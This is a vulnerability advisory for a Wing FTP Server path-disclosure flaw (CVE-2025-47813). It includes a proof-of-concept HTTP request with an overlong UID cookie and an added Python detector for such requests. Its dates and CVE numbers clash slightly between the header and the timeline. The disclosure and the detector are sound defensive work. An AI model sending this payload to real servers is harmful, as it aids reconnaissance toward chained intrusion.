Wing FTP Server Local Path Disclosure Through Overlong UID Session Cookie
Jun 30, 2025 · By Julien Ahrens
ADVISORY INFORMATION
- Product: Wing FTP Server
- Vendor URL: https://www.wftpserver.com
- CWE: Generation of Error Message Containing Sensitive Information [CWE-209]
- Date found: 2025-05-01
- Date published: 2025-06-30
- CVSSv4 Score: 5.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH)
- CVE: CVE-2025-47813
CREDITS
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.
VERSIONS AFFECTED
WingFTP Server <= 7.4.3
INTRODUCTION
Wing FTP Server is a free, easy-to-use, and secure FTP server software for Windows, Linux, and Mac OS. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. And it provides admins with a web-based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server.
(from the vendor’s homepage)
VULNERABILITY DETAILS
The endpoint at “/loginok.html” does not properly validate the value of the “UID” session cookie. If a value longer than the maximum path size of the underlying operating system is supplied this way, an error message is triggered which discloses the full local server path.
Successful exploits can allow an authenticated attacker to obtain the local server path of the application, which can help in exploiting vulnerabilities like CVE-2025-47812.
PROOF OF CONCEPT
A payload to exploit this vulnerability looks like the following:
POST /loginok.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: UID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection: keep-alive
Content-Length: 32

username=rcesec&password=correct
SOLUTION
Update to version 7.4.4
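For servers that cannot be updated right away, requests carrying an oversized UID cookie to /loginok.html can be flagged at a proxy or in captured traffic. The following is an added example, not code from the advisory or the vendor; the function names, the sample requests and the 128-character threshold are assumptions and should be adjusted to the UID length seen in legitimate sessions.

```python
# Added example: flag /loginok.html requests with an oversized UID cookie.
MAX_UID_LEN = 128  # assumption: constructed threshold, tune to your real UID length
TARGET_PATH = "/loginok.html"  # endpoint named in the advisory

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers); None if malformed."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # a client may send several Cookie headers, keep them all
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return parts[0], parts[1].split("?", 1)[0], headers

def uid_values(headers):
    """Yield every UID cookie value found in any Cookie header."""
    for header in headers.get("cookie", []):
        for pair in header.split(";"):
            name, sep, value = pair.strip().partition("=")
            if sep and name == "UID":
                yield value

def check_request(raw, max_len=MAX_UID_LEN):
    """Return a finding dict for an overlong UID sent to TARGET_PATH, else None."""
    parsed = parse_request(raw)
    if parsed is None or parsed[1] != TARGET_PATH:
        return None
    longest = max((len(v) for v in uid_values(parsed[2])), default=0)
    if longest <= max_len:
        return None
    return {"method": parsed[0], "path": parsed[1], "uid_length": longest}

# Constructed sample requests (not captured traffic).
BENIGN = ("POST /loginok.html HTTP/1.1\r\nHost: localhost\r\n"
          "Cookie: lang=english; UID=0123456789abcdef0123456789abcdef\r\n\r\n"
          "username=demo&password=demo")
OVERLONG = ("POST /loginok.html HTTP/1.1\r\nHost: localhost\r\n"
            "Cookie: UID=" + "A" * 600 + "\r\n\r\nusername=demo&password=demo")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(label, check_request(req))
```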
REPORT TIMELINE
- 2025-05-10: Discovery of the vulnerability
- 2025-05-10: MITRE assigns CVE-2025-47812
- 2025-05-12: Contacted the vendor via their support@
- 2025-05-12: Vendor confirms the issue as a critical bug
- 2025-05-14: Vendor releases version 7.4.4 which fixes the vulnerability
- 2025-06-30: Full Disclosure